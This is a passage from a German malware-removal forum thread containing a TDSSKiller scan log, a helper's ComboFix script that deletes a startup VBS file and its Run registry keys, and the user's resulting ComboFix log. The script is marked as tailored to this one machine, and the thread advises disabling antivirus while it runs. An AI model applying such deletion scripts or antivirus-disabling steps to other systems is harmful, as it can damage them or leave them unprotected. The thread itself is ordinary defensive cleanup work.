17:30:54.0124 7020  [ EAB6C35E62B1B0DB0D1B48B671D3A117 ] umbus          C:\Windows\system32\DRIVERS\umbus.sys
17:30:54.0157 7020  umbus - ok
17:30:54.0161 7020  [ B2E8E8CB557B156DA5493BBDDCC1474D ] UmPass          C:\Windows\system32\DRIVERS\umpass.sys
17:30:54.0179 7020  UmPass - ok
17:30:54.0310 7020  [ CC3775100ABA633984F73DFAE1F55CAE ] UNS            C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
17:30:54.0560 7020  UNS - ok
17:30:54.0621 7020  [ F9EC9ACD504D823D9B9CA98A4F8D3CA2 ] Updater Service C:\Program Files\Acer\Acer Updater\UpdaterService.exe
17:30:54.0844 7020  Updater Service - ok
17:30:54.0857 7020  [ D47EC6A8E81633DD18D2436B19BAF6DE ] upnphost        C:\Windows\System32\upnphost.dll
17:30:54.0913 7020  upnphost - ok
17:30:54.0946 7020  [ C9E9D59C0099A9FF51697E9306A44240 ] USBAAPL64      C:\Windows\system32\Drivers\usbaapl64.sys
17:30:54.0986 7020  USBAAPL64 - ok
17:30:55.0004 7020  [ 537A4E03D7103C12D42DFD8FFDB5BDC9 ] usbccgp        C:\Windows\system32\DRIVERS\usbccgp.sys
17:30:55.0043 7020  usbccgp - ok
17:30:55.0074 7020  [ AF0892A803FDDA7492F595368E3B68E7 ] usbcir          C:\Windows\system32\DRIVERS\usbcir.sys
17:30:55.0135 7020  usbcir - ok
17:30:55.0154 7020  [ FBB21EBE49F6D560DB37AC25FBC68E66 ] usbehci        C:\Windows\system32\drivers\usbehci.sys
17:30:55.0185 7020  usbehci - ok
17:30:55.0213 7020  [ 6B7A8A99C4A459E73C286A6763EA24CC ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
17:30:55.0254 7020  usbhub - ok
17:30:55.0277 7020  [ 8C88AA7617B4CBC2E4BED61D26B33A27 ] usbohci        C:\Windows\system32\drivers\usbohci.sys
17:30:55.0313 7020  usbohci - ok
17:30:55.0361 7020  [ 73188F58FB384E75C4063D29413CEE3D ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
17:30:55.0406 7020  usbprint - ok
17:30:55.0441 7020  [ AAA2513C8AED8B54B189FD0C6B1634C0 ] usbscan        C:\Windows\system32\DRIVERS\usbscan.sys
17:30:55.0477 7020  usbscan - ok
17:30:55.0503 7020  [ F39983647BC1F3E6100778DDFE9DCE29 ] USBSTOR        C:\Windows\system32\DRIVERS\USBSTOR.SYS
17:30:55.0536 7020  USBSTOR - ok
17:30:55.0558 7020  [ 0B5B3B2DF3FD1709618ACFA50B8392B0 ] usbuhci        C:\Windows\system32\drivers\usbuhci.sys
17:30:55.0607 7020  usbuhci - ok
17:30:55.0651 7020  [ 7CB8C573C6E4A2714402CC0A36EAB4FE ] usbvideo        C:\Windows\System32\Drivers\usbvideo.sys
17:30:55.0698 7020  usbvideo - ok
17:30:55.0718 7020  [ EDBB23CBCF2CDF727D64FF9B51A6070E ] UxSms          C:\Windows\System32\uxsms.dll
17:30:55.0783 7020  UxSms - ok
17:30:55.0798 7020  [ 156F6159457D0AA7E59B62681B56EB90 ] VaultSvc        C:\Windows\system32\lsass.exe
17:30:55.0822 7020  VaultSvc - ok
17:30:55.0860 7020  [ C5C876CCFC083FF3B128F933823E87BD ] vdrvroot        C:\Windows\system32\DRIVERS\vdrvroot.sys
17:30:55.0897 7020  vdrvroot - ok
17:30:55.0923 7020  [ 44D73E0BBC1D3C8981304BA15135C2F2 ] vds            C:\Windows\System32\vds.exe
17:30:55.0994 7020  vds - ok
17:30:56.0017 7020  [ DA4DA3F5E02943C2DC8C6ED875DE68DD ] vga            C:\Windows\system32\DRIVERS\vgapnp.sys
17:30:56.0052 7020  vga - ok
17:30:56.0057 7020  [ 53E92A310193CB3C03BEA963DE7D9CFC ] VgaSave        C:\Windows\System32\drivers\vga.sys
17:30:56.0139 7020  VgaSave - ok
17:30:56.0145 7020  [ C82E748660F62A242B2DFAC1442F22A4 ] vhdmp          C:\Windows\system32\DRIVERS\vhdmp.sys
17:30:56.0173 7020  vhdmp - ok
17:30:56.0177 7020  [ E5689D93FFE4E5D66C0178761240DD54 ] viaide          C:\Windows\system32\DRIVERS\viaide.sys
17:30:56.0196 7020  viaide - ok
17:30:56.0210 7020  [ 2B1A3DAE2B4E70DBBA822B7A03FBD4A3 ] volmgr          C:\Windows\system32\DRIVERS\volmgr.sys
17:30:56.0233 7020  volmgr - ok
17:30:56.0248 7020  [ 99B0CBB569CA79ACAED8C91461D765FB ] volmgrx        C:\Windows\system32\drivers\volmgrx.sys
17:30:56.0287 7020  volmgrx - ok
17:30:56.0319 7020  [ 9E425AC5C9A5A973273D169F43B4F5E1 ] volsnap        C:\Windows\system32\DRIVERS\volsnap.sys
17:30:56.0349 7020  volsnap - ok
17:30:56.0382 7020  [ 5E2016EA6EBACA03C04FEAC5F330D997 ] vsmraid        C:\Windows\system32\DRIVERS\vsmraid.sys
17:30:56.0405 7020  vsmraid - ok
17:30:56.0463 7020  [ 787898BF9FB6D7BD87A36E2D95C899BA ] VSS            C:\Windows\system32\vssvc.exe
17:30:56.0595 7020  VSS - ok
17:30:56.0637 7020  [ 36D4720B72B5C5D9CB2B9C29E9DF67A1 ] vwifibus        C:\Windows\system32\DRIVERS\vwifibus.sys
17:30:56.0678 7020  vwifibus - ok
17:30:56.0689 7020  [ 6A3D66263414FF0D6FA754C646612F3F ] vwififlt        C:\Windows\system32\DRIVERS\vwififlt.sys
17:30:56.0741 7020  vwififlt - ok
17:30:56.0770 7020  [ 1C9D80CC3849B3788048078C26486E1A ] W32Time        C:\Windows\system32\w32time.dll
17:30:56.0826 7020  W32Time - ok
17:30:56.0849 7020  [ 4E9440F4F152A7B944CB1663D3935A3E ] WacomPen        C:\Windows\system32\DRIVERS\wacompen.sys
17:30:56.0875 7020  WacomPen - ok
17:30:56.0896 7020  [ 47CA49400643EFFD3F1C9A27E1D69324 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
17:30:56.0945 7020  WANARP - ok
17:30:56.0949 7020  [ 47CA49400643EFFD3F1C9A27E1D69324 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
17:30:56.0990 7020  Wanarpv6 - ok
17:30:57.0080 7020  [ 3CEC96DE223E49EAAE3651FCF8FAEA6C ] WatAdminSvc    C:\Windows\system32\Wat\WatAdminSvc.exe
17:30:57.0212 7020  WatAdminSvc - ok
17:30:57.0287 7020  [ 5AB1BB85BD8B5089CC5D64200DEDAE68 ] wbengine        C:\Windows\system32\wbengine.exe
17:30:57.0340 7020  wbengine - ok
17:30:57.0355 7020  [ 3AA101E8EDAB2DB4131333F4325C76A3 ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
17:30:57.0389 7020  WbioSrvc - ok
17:30:57.0427 7020  [ DD1BAE8EBFC653824D29CCF8C9054D68 ] wcncsvc        C:\Windows\System32\wcncsvc.dll
17:30:57.0478 7020  wcncsvc - ok
17:30:57.0492 7020  [ 20F7441334B18CEE52027661DF4A6129 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
17:30:57.0515 7020  WcsPlugInService - ok
17:30:57.0554 7020  [ 72889E16FF12BA0F235467D6091B17DC ] Wd              C:\Windows\system32\DRIVERS\wd.sys
17:30:57.0570 7020  Wd - ok
17:30:57.0605 7020  [ 442783E2CB0DA19873B7A63833FF4CB4 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
17:30:57.0653 7020  Wdf01000 - ok
17:30:57.0668 7020  [ BF1FC3F79B863C914687A737C2F3D681 ] WdiServiceHost  C:\Windows\system32\wdi.dll
17:30:57.0700 7020  WdiServiceHost - ok
17:30:57.0707 7020  [ BF1FC3F79B863C914687A737C2F3D681 ] WdiSystemHost  C:\Windows\system32\wdi.dll
17:30:57.0728 7020  WdiSystemHost - ok
17:30:57.0765 7020  [ 733006127F235BE7C35354EBEE7B9A7B ] WebClient      C:\Windows\System32\webclnt.dll
17:30:57.0826 7020  WebClient - ok
17:30:57.0861 7020  [ C749025A679C5103E575E3B48E092C43 ] Wecsvc          C:\Windows\system32\wecsvc.dll
17:30:57.0937 7020  Wecsvc - ok
17:30:57.0945 7020  [ 7E591867422DC788B9E5BD337A669A08 ] wercplsupport  C:\Windows\System32\wercplsupport.dll
17:30:57.0997 7020  wercplsupport - ok
17:30:58.0029 7020  [ 6D137963730144698CBD10F202E9F251 ] WerSvc          C:\Windows\System32\WerSvc.dll
17:30:58.0090 7020  WerSvc - ok
17:30:58.0126 7020  [ 611B23304BF067451A9FDEE01FBDD725 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
17:30:58.0198 7020  WfpLwf - ok
17:30:58.0218 7020  [ 05ECAEC3E4529A7153B3136CEB49F0EC ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
17:30:58.0237 7020  WIMMount - ok
17:30:58.0261 7020  WinDefend - ok
17:30:58.0269 7020  WinHttpAutoProxySvc - ok
17:30:58.0325 7020  [ 19B07E7E8915D701225DA41CB3877306 ] Winmgmt        C:\Windows\system32\wbem\WMIsvc.dll
17:30:58.0387 7020  Winmgmt - ok
17:30:58.0450 7020  [ 41FBB751936B387F9179E7F03A74FE29 ] WinRM          C:\Windows\system32\WsmSvc.dll
17:30:58.0620 7020  WinRM - ok
17:30:58.0682 7020  [ 817EAFF5D38674EDD7713B9DFB8E9791 ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
17:30:58.0724 7020  WinUsb - ok
17:30:58.0765 7020  [ 4FADA86E62F18A1B2F42BA18AE24E6AA ] Wlansvc        C:\Windows\System32\wlansvc.dll
17:30:58.0803 7020  Wlansvc - ok
17:30:58.0909 7020  [ 357CABBF155AFD1D3926E62539D2A3A7 ] wlidsvc        C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
17:30:59.0012 7020  wlidsvc - ok
17:30:59.0054 7020  [ F6FF8944478594D0E414D3F048F0D778 ] WmiAcpi        C:\Windows\system32\DRIVERS\wmiacpi.sys
17:30:59.0068 7020  WmiAcpi - ok
17:30:59.0101 7020  [ 38B84C94C5A8AF291ADFEA478AE54F93 ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
17:30:59.0139 7020  wmiApSrv - ok
17:30:59.0170 7020  WMPNetworkSvc - ok
17:30:59.0198 7020  [ 96C6E7100D724C69FCF9E7BF590D1DCA ] WPCSvc          C:\Windows\System32\wpcsvc.dll
17:30:59.0221 7020  WPCSvc - ok
17:30:59.0232 7020  [ 2E57DDF2880A7E52E76F41C7E96D327B ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
17:30:59.0266 7020  WPDBusEnum - ok
17:30:59.0294 7020  [ 6BCC1D7D2FD2453957C5479A32364E52 ] ws2ifsl        C:\Windows\system32\drivers\ws2ifsl.sys
17:30:59.0352 7020  ws2ifsl - ok
17:30:59.0387 7020  [ 8F9F3969933C02DA96EB0F84576DB43E ] wscsvc          C:\Windows\system32\wscsvc.dll
17:30:59.0428 7020  wscsvc - ok
17:30:59.0434 7020  WSearch - ok
17:30:59.0518 7020  [ D9EF901DCA379CFE914E9FA13B73B4C4 ] wuauserv        C:\Windows\system32\wuaueng.dll
17:30:59.0620 7020  wuauserv - ok
17:30:59.0645 7020  [ AB886378EEB55C6C75B4F2D14B6C869F ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
17:30:59.0662 7020  WudfPf - ok
17:30:59.0668 7020  [ DDA4CAF29D8C0A297F886BFE561E6659 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
17:30:59.0704 7020  WUDFRd - ok
17:30:59.0722 7020  [ B20F051B03A966392364C83F009F7D17 ] wudfsvc        C:\Windows\System32\WUDFSvc.dll
17:30:59.0752 7020  wudfsvc - ok
17:30:59.0786 7020  [ 9A3452B3C2A46C073166C5CF49FAD1AE ] WwanSvc        C:\Windows\System32\wwansvc.dll
17:30:59.0847 7020  WwanSvc - ok
17:30:59.0893 7020  ================ Scan global ===============================
17:30:59.0906 7020  [ BA0CD8C393E8C9F83354106093832C7B ] C:\Windows\system32\basesrv.dll
17:30:59.0931 7020  [ 3FB74FF230B5D240A57AE1C4A3D0459D ] C:\Windows\system32\winsrv.dll
17:30:59.0939 7020  [ 3FB74FF230B5D240A57AE1C4A3D0459D ] C:\Windows\system32\winsrv.dll
17:30:59.0962 7020  [ D6160F9D869BA3AF0B787F971DB56368 ] C:\Windows\system32\sxssrv.dll
17:30:59.0990 7020  [ 24ACB7E5BE595468E3B9AA488B9B4FCB ] C:\Windows\system32\services.exe
17:30:59.0993 7020  [Global] - ok
17:30:59.0994 7020  ================ Scan MBR ==================================
17:31:00.0010 7020  [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
17:31:00.0447 7020  \Device\Harddisk0\DR0 - ok
17:31:01.0021 7020  [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk1\DR1
17:31:03.0951 7020  \Device\Harddisk1\DR1 - ok
17:31:03.0953 7020  ================ Scan VBR ==================================
17:31:03.0954 7020  [ 413939B23BF5AF1D5254B1C91E95717F ] \Device\Harddisk0\DR0\Partition1
17:31:03.0958 7020  \Device\Harddisk0\DR0\Partition1 - ok
17:31:04.0001 7020  [ 285C32C1FE1855F6EFD81EDC0553CED8 ] \Device\Harddisk0\DR0\Partition2
17:31:04.0003 7020  \Device\Harddisk0\DR0\Partition2 - ok
17:31:04.0008 7020  [ C197AE18746C60A57FFA85CB865EF867 ] \Device\Harddisk1\DR1\Partition1
17:31:04.0010 7020  \Device\Harddisk1\DR1\Partition1 - ok
17:31:04.0010 7020  ============================================================
17:31:04.0010 7020  Scan finished
17:31:04.0010 7020  ============================================================
17:31:04.0020 6536  Detected object count: 3
17:31:04.0020 6536  Actual detected object count: 3
17:31:39.0801 6536  AtherosSvc ( UnsignedFile.Multi.Generic ) - skipped by user
17:31:39.0801 6536  AtherosSvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
17:31:39.0802 6536  nlsvc ( UnsignedFile.Multi.Generic ) - skipped by user
17:31:39.0802 6536  nlsvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
17:31:39.0803 6536  NTI IScheduleSvc ( UnsignedFile.Multi.Generic ) - skipped by user
17:31:39.0803 6536  NTI IScheduleSvc ( UnsignedFile.Multi.Generic ) - User select action: Skip


schrauber 22.04.2014 19:24

Hinweis für Mitleser:
Folgendes ComboFix Skript ist ausschließlich für diesen User in dieser Situtation erstellt worden.
Auf keinen Fall auf anderen Rechnern anwenden, das kann andere Systeme nachhaltig schädigen!

Lösche die vorhandene Combofix.exe von deinem Desktop und lade das Programm vom folgenden Download-Spiegel neu herunter:
BleepingComputer.com
und speichere es erneut auf dem Desktop (nicht woanders hin, das ist wichtig)!

Drücke die Windows + R Taste --> Notepad (hinein schreiben) --> OK

Kopiere nun den Text aus der folgenden Codebox komplett in das leere Textdokument.
Code:

Rootkit::
c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
Registry::
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wtbchkxbde"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wtbchkxbde"=-

Speichere dies als CFScript.txt auf Deinem Desktop.

Wichtig:
  • Stelle deine Anti Viren Software temprär ab. Dies kann ComboFix nämlich bei der Arbeit behindern.
    Danach wieder anstellen nicht vergessen!
  • Bewege nicht die Maus über das ComboFix-Fenster oder klicke in dieses hinein.
    Dies kann dazu führen, dass ComboFix sich aufhängt.
  • Schließe alle laufenden Programme. Gehe sicher das ComboFix ungehindert arbeiten kann.
  • Mache nichts am PC solange ComboFix läuft.
http://i266.photobucket.com/albums/i.../CFScriptB.gif
  • In Bezug auf obiges Bild, ziehe CFScript.txt in die ComboFix.exe
  • Wenn ComboFix fertig ist, wird es ein Log erstellen, C:\ComboFix.txt. Bitte füge es hier als Antwort ein.
Falls im Skript die Anweisung Suspect:: oder Collect:: enthalten ist, wird eine Message-Box erscheinen, nachdem Combofix fertig ist. Klicke OK und folge den Aufforderungen/Anweisungen, um die Dateien hochzuladen.

fxak 22.04.2014 22:29

neue CombofixTxt:

Code:

ComboFix 14-04-20.01 - Franz 22.04.2014  22:51:31.4.4 - x64
Microsoft Windows 7 Home Premium  6.1.7600.0.1252.49.1031.18.3764.1949 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
Benutzte Befehlsschalter :: c:\users\Franz\Desktop\CFScript.txt
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((  Dateien erstellt von 2014-03-22 bis 2014-04-22  ))))))))))))))))))))))))))))))
.
.
2014-04-22 21:03 . 2014-04-22 21:03        --------        d-----w-        c:\users\Default\AppData\Local\temp
2014-04-22 00:40 . 2014-04-22 15:13        --------        d-----w-        c:\program files (x86)\Smadav
2014-04-22 00:40 . 2014-04-22 00:40        --------        d-----w-        c:\users\Franz\AppData\Roaming\Smadav
2014-04-18 21:16 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 21:14 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-16 21:46 . 2014-04-16 21:46        --------        d-----w-        c:\windows\ERUNT
2014-04-16 21:07 . 2014-04-16 21:10        119512        ----a-w-        c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\program files (x86)\Malwarebytes Anti-Malware
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\programdata\Malwarebytes
2014-04-16 21:06 . 2014-04-03 07:51        63192        ----a-w-        c:\windows\system32\drivers\mwac.sys
2014-04-16 21:06 . 2014-04-03 07:51        88280        ----a-w-        c:\windows\system32\drivers\mbamchameleon.sys
2014-04-16 21:06 . 2014-04-03 07:50        25816        ----a-w-        c:\windows\system32\drivers\mbam.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\users\Franz\AppData\Local\Programs
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-20 03:21        --------        d-----w-        C:\FRST
2014-04-07 07:32 . 2014-04-22 02:41        --------        d-----w-        C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30        --------        d-----w-        c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54        --------        d-----w-        c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19        --------        d-----w-        c:\programdata\Norton
2014-03-25 07:40 . 2014-03-25 07:40        --------        d-----w-        C:\found.001
.
.
.
((((((((((((((((((((((((((((((((((((  Find3M Bericht  ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37        22240        ----a-w-        c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((  Autostartpunkte der Registrierung  ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
S3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
.
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - 44255850
*Deregistered* - 44255850
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02        1150280        ----a-w-        c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-22 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-22 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
